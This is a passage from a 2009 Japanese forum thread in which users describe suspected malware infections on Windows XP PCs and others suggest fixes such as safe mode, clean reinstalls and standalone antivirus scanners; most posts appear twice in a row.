971 : ◆N9P3SuvBPo :2009/06/01(月) 00:50:25
これも自業自得ですね。
1.電源入れてからどの辺りまで正常に起動できるか
2.セーフモードでの起動も試してみたか
1.電源入れてからどの辺りまで正常に起動できるか
2.セーフモードでの起動も試してみたか
972 :名無しさん@お腹いっぱい。:2009/06/01(月) 01:03:26
>>971
レスありがとうございます
PCの起動ボタンを押すと反応するときとしないときがあります。
反応したときはDELLのロゴが出てくるところまで行くこともありますが、行かないこともあります。
ロゴまで行ってもそれ以上進むことはなく、ロゴが表示してる間にF8ボタンを押すと一度だけ進み、
通常起動する(うろ覚え)を選び、何もなかったかのように起動してデスクトップまで行きましたが
ウィルスバスター2009でフルスキャンをかけている途中で突然強制終了しました。
まだセーフモードで起動は試みてませんが、次いけそうであればやってみます。
それと次起動できたときはスキャンよりシステムの復元を試したほうがよいでしょうか?
レスありがとうございます
PCの起動ボタンを押すと反応するときとしないときがあります。
反応したときはDELLのロゴが出てくるところまで行くこともありますが、行かないこともあります。
ロゴまで行ってもそれ以上進むことはなく、ロゴが表示してる間にF8ボタンを押すと一度だけ進み、
通常起動する(うろ覚え)を選び、何もなかったかのように起動してデスクトップまで行きましたが
ウィルスバスター2009でフルスキャンをかけている途中で突然強制終了しました。
まだセーフモードで起動は試みてませんが、次いけそうであればやってみます。
それと次起動できたときはスキャンよりシステムの復元を試したほうがよいでしょうか?
973 : ◆N9P3SuvBPo :2009/06/01(月) 01:11:49
>972
PCに繋がっている周辺機器(マウス・キーボード以外)を外しても同じことになりますか?
システムの復元はイチかバチかの賭け
上手く行けば良いけど…
PCに繋がっている周辺機器(マウス・キーボード以外)を外しても同じことになりますか?
システムの復元はイチかバチかの賭け
上手く行けば良いけど…
974 :名無しさん@お腹いっぱい。:2009/06/01(月) 01:26:35
>>973
もう夜も遅いので、また明日やってみることにします
もう夜も遅いので、また明日やってみることにします
975 :名無しさん@お腹いっぱい。:2009/06/01(月) 03:08:36
ネットで調べてみましたが
どうやらBlasterというウィルスみたいですね
どうやらBlasterというウィルスみたいですね
976 : ◆N9P3SuvBPo :2009/06/01(月) 20:46:18
Blasterワームとは違いますね…
もしBlasterなら再起動という症状ですし。
もしBlasterなら再起動という症状ですし。
977 :名無しさん@お腹いっぱい。:2009/06/02(火) 00:41:56
>>968わかる方いませんか?
978 :名無しさん@お腹いっぱい。:2009/06/02(火) 01:41:15
979 :名無しさん@お腹いっぱい。:2009/06/02(火) 02:26:22
>>978
マルチポストじゃないですが・・
マルチポストじゃないですが・・
980 :名無しさん@お腹いっぱい。:2009/06/02(火) 07:43:20
トロイの木馬スレでも質問しましたが
心配なのでこちらでも聞かせてもらいます。
特徴が、
・1時間ぐらいごとにインターネットが強制終了される。
・今まで使っていたトレンド社のウイルススキャンが使えない
・さらに、他何社かのウイルススキャンも試してみたが、
『ネットワークに接続してください』などと出て、
ウイルスキャン自体が使えない。
他にもあると思うんですがいま分かっているのは
これだけです。
インターネットは利用でき、他は問題なく使えますが
こんなことは初めてなのでどうしたらいいかも、
知識もまったくありません。
ファイルスキャンという物も試そうと思ってみましたが、
どこに潜んでいるのかも分からず完全に手詰まりです。
どなたか解決方法、解決までの手順などを教えてください。
【使用OS】 「windows xp」
【Microsoft Update(MU)の状態】 「最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】
【使用セキュリティソフトとバージョン】 「体験版をインストールしていたが、使用期限が切れている」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「不明(スキャン不可)」
スレ違いでしたらご指摘下さい。
よろしくお願いします。
心配なのでこちらでも聞かせてもらいます。
特徴が、
・1時間ぐらいごとにインターネットが強制終了される。
・今まで使っていたトレンド社のウイルススキャンが使えない
・さらに、他何社かのウイルススキャンも試してみたが、
『ネットワークに接続してください』などと出て、
ウイルスキャン自体が使えない。
他にもあると思うんですがいま分かっているのは
これだけです。
インターネットは利用でき、他は問題なく使えますが
こんなことは初めてなのでどうしたらいいかも、
知識もまったくありません。
ファイルスキャンという物も試そうと思ってみましたが、
どこに潜んでいるのかも分からず完全に手詰まりです。
どなたか解決方法、解決までの手順などを教えてください。
【使用OS】 「windows xp」
【Microsoft Update(MU)の状態】 「最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】
【使用セキュリティソフトとバージョン】 「体験版をインストールしていたが、使用期限が切れている」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「不明(スキャン不可)」
スレ違いでしたらご指摘下さい。
よろしくお願いします。
981 :名無しさん@お腹いっぱい。:2009/06/02(火) 09:10:29
クリーンインストール
982 :名無しさん@お腹いっぱい。:2009/06/02(火) 09:26:49
>>980
ttp://drweb.jp/support/cureit.html
ttp://avptool.virusinfo.info/en/index.htm
ttp://www.norman.com/support/support_tools/58732/en
スタンドアロン型のアンチウイルス。
他のPCでダウンロードして、CDかUSBメモリで移して使ってみたら?
ttp://drweb.jp/support/cureit.html
ttp://avptool.virusinfo.info/en/index.htm
ttp://www.norman.com/support/support_tools/58732/en
スタンドアロン型のアンチウイルス。
他のPCでダウンロードして、CDかUSBメモリで移して使ってみたら?
983 :名無しさん@お腹いっぱい。:2009/06/02(火) 12:29:42
>使用期限が切れている
論外。
論外。
>>980
ウイルスじゃなくてマルウエアが入ってて、セキュリティベンダーへのアクセスを阻害されてるんだと思う。たぶんHOST情報も書き換えられてる予感。
まずクリーンインストールし、Windows Updateを実施。
それからフリーでもいいからアンチウイルスソフトとアンチスパイウエア(マルウエア)ソフトを必ずインストールし、毎日Updateする癖をつけたほうが良い。スキャンも。
ウイルスやマルウエアを撒き散らすPCでメール送受信するのは大迷惑だ。
もしサイト持ちなら、そんなセキュリティ認識が無い管理人のサイトは勘弁して欲しいし、二度とサイトに行かない。
aviraもしくはavastでウイルス対策。
SUPERAntispyware、windows defenderでマルウエア対策。
PC初心者なら通産省で配布しているCCCクリーナーも数日に一度Updateされているので、そちらでのスキャンを試してみるもの良いと思う。
それにもアクセスできないかな?
ウイルスじゃなくてマルウエアが入ってて、セキュリティベンダーへのアクセスを阻害されてるんだと思う。たぶんHOST情報も書き換えられてる予感。
まずクリーンインストールし、Windows Updateを実施。
それからフリーでもいいからアンチウイルスソフトとアンチスパイウエア(マルウエア)ソフトを必ずインストールし、毎日Updateする癖をつけたほうが良い。スキャンも。
ウイルスやマルウエアを撒き散らすPCでメール送受信するのは大迷惑だ。
もしサイト持ちなら、そんなセキュリティ認識が無い管理人のサイトは勘弁して欲しいし、二度とサイトに行かない。
aviraもしくはavastでウイルス対策。
SUPERAntispyware、windows defenderでマルウエア対策。
PC初心者なら通産省で配布しているCCCクリーナーも数日に一度Updateされているので、そちらでのスキャンを試してみるもの良いと思う。
それにもアクセスできないかな?